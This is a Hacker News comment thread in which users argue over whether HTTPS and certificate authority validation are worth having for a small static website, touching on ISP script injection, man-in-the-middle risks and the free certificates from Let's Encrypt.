Hacker News new | ask | show | jobs
by jtafurth 447 days ago
I worked for an authority that issued digital certificates for SSL and digital signatures. It's not only about providing encryption but also about trust, when a top level entity issues a SSL certificate, a number of identity validations are carried out, adding an extra layer or confidence on that website.

This may seem inconsequential for static websites without PII, however most browsers consider it important as it reduces the risk for all parties involved when encrypted communication is used and the content providers has taken basic steps for Identity verification.

There are logic flaws with this approach to security imo, but it's the most commonly used technique at the moment.
1 comments
sergiotapia 447 days ago
you didn't answer the _why do we need all that for a drum beat making website_?
link
jdiez17 447 days ago
Unauthenticated http is a vector for opportunistic malware. They don’t target specific websites, just inject evil.js wherever.
link
otabdeveloper4 447 days ago
You ISP sniffing and MiTMing traffic on the wire is the least likely vector of malware injection.

ISP's are usually serious businesses with reputations and don't hack their own customers.

link
latexr 447 days ago
That “usually” is doing a ton of work. I remember Vodafone injecting scripts into webpages many years ago. While trying to find a source, I bumped into other shenanigans.

https://www.simpleanalytics.com/blog/vodafone-deutsche-telek...

link
otabdeveloper4 446 days ago
Out of all the bad actors on the Internet, your ISP is the least bad.
link
latexr 446 days ago
That’s not a valid defence, it’s moving the goalposts and whataboutism. ISPs shouldn’t be bad actors at all and they have the ability to do the most harm.
link
kube-system 446 days ago
Maybe if they live in a high income country with relatively strong consumer protections and are using their home ISP. But quite a lot of the internet is very much not that.

In some places and on some networks, MiTMing http traffic for undesirable use-cases is routine.

link
nklymok 447 days ago
At least so that login / register data don't go to the middle man.
link
otabdeveloper4 447 days ago
You don't. But you will be penalized by Big Co for not supporting https.

(It's effectively a "doing business on the Internet" tax. Thankfully not that expensive for small hobby projects now.)

link
nerdponx 446 days ago
It's literally $0 with LetsEncrypt.
link